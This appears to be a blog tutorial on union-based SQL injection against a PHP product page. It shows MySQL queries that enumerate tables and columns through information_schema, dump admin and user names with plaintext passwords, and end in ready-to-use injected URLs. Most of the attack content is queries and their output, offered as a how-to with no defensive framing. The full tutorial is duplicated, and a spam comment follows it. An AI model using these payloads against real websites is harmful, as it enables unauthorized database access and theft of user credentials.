Okay, now that we know what are the tables in the Database, we will try to dump the contents of the Table from the Database.
So as we know we have 3 tables, in the 'ckorner' database, viz 'admin', 'products', 'users'
And we also know that the columns of 'admin' are 'id', 'name' and 'pwd', lets now try dumping the records.
So our URL is
www.example.com/products.php?id = 1
Developers side is on the left hand side of '=' and right hand side is for us.
Lets try to frame the query in MySQL server.
The Normal Query:
mysql> select id, product, price from products where id=1;
+------+---------+-------+
| id | product | price |
+------+---------+-------+
| 1 | printer | 2500 |
+------+---------+-------+
1 row in set (0.00 sec)
mysql>
Now our Fuzzing starts
mysql> select id, product, price from products where id= 1 union select 1,2,table_name from information_schema.tables where table_schema='ckorner';
+------+---------+----------+
| id | product | price |
+------+---------+----------+
| 1 | printer | 2500 |
| 1 | 2 | admin |
| 1 | 2 | products |
| 1 | 2 | users |
+------+---------+----------+
4 rows in set (0.00 sec)
mysql> select id, product, price from products where id= 1 union select 1,2,column_name from information_schema.columns where table_name='admin';
+------+---------+-------+
| id | product | price |
+------+---------+-------+
| 1 | printer | 2500 |
| 1 | 2 | id |
| 1 | 2 | name |
| 1 | 2 | pwd |
+------+---------+-------+
4 rows in set (0.00 sec)
mysql> select id, product, price from products where id= 1 union select 1,2,id from ckorner.admin;
+------+---------+-------+
| id | product | price |
+------+---------+-------+
| 1 | printer | 2500 |
| 1 | 2 | 1 |
| 1 | 2 | 2 |
| 1 | 2 | 3 |
+------+---------+-------+
4 rows in set (0.00 sec)
mysql> select id, product, price from products where id = 1 union select 1,2,name from ckorner.admin;
+------+---------+---------+
| id | product | price |
+------+---------+---------+
| 1 | printer | 2500 |
| 1 | 2 | whiskey |
| 1 | 2 | Kumar |
| 1 | 2 | Onty |
+------+---------+---------+
4 rows in set (0.00 sec)
mysql> select id, product, price from products where id = 1 union select 1,2,pwd from ckorner.admin;
+------+---------+-------------+
| id | product | price |
+------+---------+-------------+
| 1 | printer | 2500 |
| 1 | 2 | whiskey@123 |
| 1 | 2 | kumar@123 |
| 1 | 2 | Onty@123 |
+------+---------+-------------+
4 rows in set (0.00 sec)
mysql> select id, product, price from products where id= 1 union select 1,2,concat(name, pwd) from ckorner.admin;
+------+---------+--------------------+
| id | product | price |
+------+---------+--------------------+
| 1 | printer | 2500 |
| 1 | 2 | whiskeywhiskey@123 |
| 1 | 2 | Kumarkumar@123 |
| 1 | 2 | OntyOnty@123 |
+------+---------+--------------------+
4 rows in set (0.00 sec)
mysql> select id, product, price from products where id= 1 union select 1,2,group_concat(name, pwd) from ckorner.admin;
+------+---------+------------------------------------------------+
| id | product | price |
+------+---------+------------------------------------------------+
| 1 | printer | 2500 |
| 1 | 2 | whiskeywhiskey@123,Kumarkumar@123,OntyOnty@123 |
+------+---------+------------------------------------------------+
2 rows in set (0.00 sec)
mysql> select id, product, price from products where id = 9 union select 1,2,group_concat(id, product, price) from ckorner.products;
+------+---------+-------------------------------------------------------+
| id | product | price |
+------+---------+-------------------------------------------------------+
| 1 | 2 | 1printer2500,2Laptop15000,3Desktop25000,4pen-drive300 |
+------+---------+-------------------------------------------------------+
1 row in set (0.00 sec)
mysql> select id, product, price from products where id = 9 union select 1,2,group_concat(id, name, pwd) from ckorner.users;
+------+---------+---------------------------------------------------------+
| id | product | price |
+------+---------+---------------------------------------------------------+
| 1 | 2 | 1Rishabhrishabh@123,2Web Rulerweb@123,3Mafiozimafia@123 |
+------+---------+---------------------------------------------------------+
1 row in set (0.00 sec)
mysql>
So, we see here, if we know the database name, table name and the columns in the table, we can dump the contents.
Now lets build the same in our URL:
www.example.com/products.php?id = 1 union select 1,2,group_concat(id, name, pwd) from ckorner.users --+
In case the above result doesnt dump the contents, like before we need to give an ID that does exist in the table, i prefer using negative values.
www.example.com/products.php?id = -1 union select 1,2,group_concat(id, name, pwd) from ckorner.users --+
And This would dump all the id, name and pwd records from the 'ckorner' database.
Hope this was informative, Stay Tuned For More.
So as we know we have 3 tables, in the 'ckorner' database, viz 'admin', 'products', 'users'
And we also know that the columns of 'admin' are 'id', 'name' and 'pwd', lets now try dumping the records.
So our URL is
www.example.com/products.php?id = 1
Developers side is on the left hand side of '=' and right hand side is for us.
Lets try to frame the query in MySQL server.
The Normal Query:
mysql> select id, product, price from products where id=1;
+------+---------+-------+
| id | product | price |
+------+---------+-------+
| 1 | printer | 2500 |
+------+---------+-------+
1 row in set (0.00 sec)
mysql>
Now our Fuzzing starts
mysql> select id, product, price from products where id= 1 union select 1,2,table_name from information_schema.tables where table_schema='ckorner';
+------+---------+----------+
| id | product | price |
+------+---------+----------+
| 1 | printer | 2500 |
| 1 | 2 | admin |
| 1 | 2 | products |
| 1 | 2 | users |
+------+---------+----------+
4 rows in set (0.00 sec)
mysql> select id, product, price from products where id= 1 union select 1,2,column_name from information_schema.columns where table_name='admin';
+------+---------+-------+
| id | product | price |
+------+---------+-------+
| 1 | printer | 2500 |
| 1 | 2 | id |
| 1 | 2 | name |
| 1 | 2 | pwd |
+------+---------+-------+
4 rows in set (0.00 sec)
mysql> select id, product, price from products where id= 1 union select 1,2,id from ckorner.admin;
+------+---------+-------+
| id | product | price |
+------+---------+-------+
| 1 | printer | 2500 |
| 1 | 2 | 1 |
| 1 | 2 | 2 |
| 1 | 2 | 3 |
+------+---------+-------+
4 rows in set (0.00 sec)
mysql> select id, product, price from products where id = 1 union select 1,2,name from ckorner.admin;
+------+---------+---------+
| id | product | price |
+------+---------+---------+
| 1 | printer | 2500 |
| 1 | 2 | whiskey |
| 1 | 2 | Kumar |
| 1 | 2 | Onty |
+------+---------+---------+
4 rows in set (0.00 sec)
mysql> select id, product, price from products where id = 1 union select 1,2,pwd from ckorner.admin;
+------+---------+-------------+
| id | product | price |
+------+---------+-------------+
| 1 | printer | 2500 |
| 1 | 2 | whiskey@123 |
| 1 | 2 | kumar@123 |
| 1 | 2 | Onty@123 |
+------+---------+-------------+
4 rows in set (0.00 sec)
mysql> select id, product, price from products where id= 1 union select 1,2,concat(name, pwd) from ckorner.admin;
+------+---------+--------------------+
| id | product | price |
+------+---------+--------------------+
| 1 | printer | 2500 |
| 1 | 2 | whiskeywhiskey@123 |
| 1 | 2 | Kumarkumar@123 |
| 1 | 2 | OntyOnty@123 |
+------+---------+--------------------+
4 rows in set (0.00 sec)
mysql> select id, product, price from products where id= 1 union select 1,2,group_concat(name, pwd) from ckorner.admin;
+------+---------+------------------------------------------------+
| id | product | price |
+------+---------+------------------------------------------------+
| 1 | printer | 2500 |
| 1 | 2 | whiskeywhiskey@123,Kumarkumar@123,OntyOnty@123 |
+------+---------+------------------------------------------------+
2 rows in set (0.00 sec)
mysql> select id, product, price from products where id = 9 union select 1,2,group_concat(id, product, price) from ckorner.products;
+------+---------+-------------------------------------------------------+
| id | product | price |
+------+---------+-------------------------------------------------------+
| 1 | 2 | 1printer2500,2Laptop15000,3Desktop25000,4pen-drive300 |
+------+---------+-------------------------------------------------------+
1 row in set (0.00 sec)
mysql> select id, product, price from products where id = 9 union select 1,2,group_concat(id, name, pwd) from ckorner.users;
+------+---------+---------------------------------------------------------+
| id | product | price |
+------+---------+---------------------------------------------------------+
| 1 | 2 | 1Rishabhrishabh@123,2Web Rulerweb@123,3Mafiozimafia@123 |
+------+---------+---------------------------------------------------------+
1 row in set (0.00 sec)
mysql>
So, we see here, if we know the database name, table name and the columns in the table, we can dump the contents.
Now lets build the same in our URL:
www.example.com/products.php?id = 1 union select 1,2,group_concat(id, name, pwd) from ckorner.users --+
In case the above result doesnt dump the contents, like before we need to give an ID that does exist in the table, i prefer using negative values.
www.example.com/products.php?id = -1 union select 1,2,group_concat(id, name, pwd) from ckorner.users --+
And This would dump all the id, name and pwd records from the 'ckorner' database.
Hope this was informative, Stay Tuned For More.
Hello friends visit my blog for PC Software Games, Mobile Application Wallpapers and much more...
ReplyDeletewww.miniworldfree4u.blogspot.com